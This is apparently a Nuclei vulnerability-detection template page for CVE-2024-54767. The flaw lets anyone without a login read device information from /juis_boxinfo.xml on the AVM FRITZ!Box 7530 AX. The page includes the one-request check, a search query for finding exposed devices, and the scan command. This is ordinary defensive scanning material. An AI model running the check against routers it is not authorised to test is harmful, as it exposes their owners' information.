AVM FRITZ!Box 7530 AX - Unauthorized Access
ID: CVE-2024-54767
Severity: high
Author: DhiyaneshDK
Tags: cve,cve2024,fritz!box,info-leak,unauth
Description
An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication.
YAML Source
id: CVE-2024-54767

info:
  name: AVM FRITZ!Box 7530 AX - Unauthorized Access
  author: DhiyaneshDK
  severity: high
  description: |
    An access control issue in the component /juis_boxinfo.xml of AVM FRITZ!Box 7530 AX v7.59 allows attackers to obtain sensitive information without authentication.
  reference:
    - https://github.com/Shuanunio/CVE_Requests/blob/main/AVM/fritz/AVM_FRITZ%21Box_7530%20AX_unauthorized_access_vulnerability_first.md
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-54767
    cwe-id: CWE-203
    epss-score: 0.00043
    epss-percentile: 0.1187
  metadata:
    verified: true
    max-request: 1
    fofa-query: body="FRITZ!Box 7530"
  tags: cve,cve2024,fritz!box,info-leak,unauth

http:
  - raw:
      - |
        GET //juis_boxinfo.xml HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<e:BoxInfo"

      - type: word
        part: content_type
        words:
          - "text/xml"

      - type: status
        status:
          - 200
# digest: 490a0046304402201dbe8caed23426896aa289454271cd60ef12bb924c9c46c9742ed32a65af9afc02200a2e83caad4e6630af7c7322643cc9b34af43e38df1bd15a0fb585312788f0d2:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-54767.yaml"